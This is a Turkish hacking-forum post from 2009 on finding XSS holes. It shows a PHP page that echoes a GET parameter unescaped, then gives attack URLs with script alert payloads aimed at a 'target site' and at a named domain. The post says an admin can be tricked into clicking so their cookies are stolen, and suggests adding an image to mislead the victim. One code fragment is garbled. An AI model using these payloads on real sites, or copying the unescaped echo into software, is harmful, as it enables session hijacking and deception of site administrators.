İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

Xss bulma yöntemleri

12-06-2009 17:32
#1
atlas_tr - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2008
Nereden:
NErDe OLsam BEğeNİRsin
Mesajlar:
2.383
Teşekkür (Etti):
19
Teşekkür (Aldı):
189
Konular:
389
Ticaret:
(0) %
Bir Php Kod oLsun

Alıntı:
form action="antijen.php" method="GET" />
Hoşgeldiniz!
<p>Isminizi girin: <input type="text" name="name_1" /><br />
<input type="submit" value="Go" /></p><br>
</form>

< ? p h p
echo "<p>Nickiniz<br />";
echo ($_GET[name_1]);

? >

dosyanın adı antijen.php oLsun...

Xss açığını yaratan hasarlı kod :


PHP Kodu:

echo ($_GET[name_1])





Böyle bir kodla karşılaştık diyelim :


PHP Kodu:


http://hedefsiteadresi.com/antijen.php?name_1=<s cript>al er t(1);</scrip t>



Site mysql ile çalışan bir database'li sistemse, admin'e bir şekilde tıklattırarak cookie alınabilir.

Tek hasarlı kodu bu mu derseniz tabi ki değil ;

antijen.php 'de şu kodlar olsun :


PHP Kodu:

here $_GET['Exploit




Saldırılacak şekil :


PHP Kodu:

http://www.karaalevteam.com/antijen.php?Exploit=<sc ript>al ert(1);</sc ript




Sonuna herhangi bir resim de eklenilip, amacımızın cookie çalmakla bir ilgisi olmadığı yönünde yanıltma yoluna gidebiliriz.

Alıntı

Not : a.l.e.r.t ve s.c.r.i.p.t gibi yerlerde boşluk bırakılmıştır.siz bu boşlukları birleştirin.sansür koyulduğundan dolayı aralarında boşluk bırakılmıştır.
Kullanıcı İmzası


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı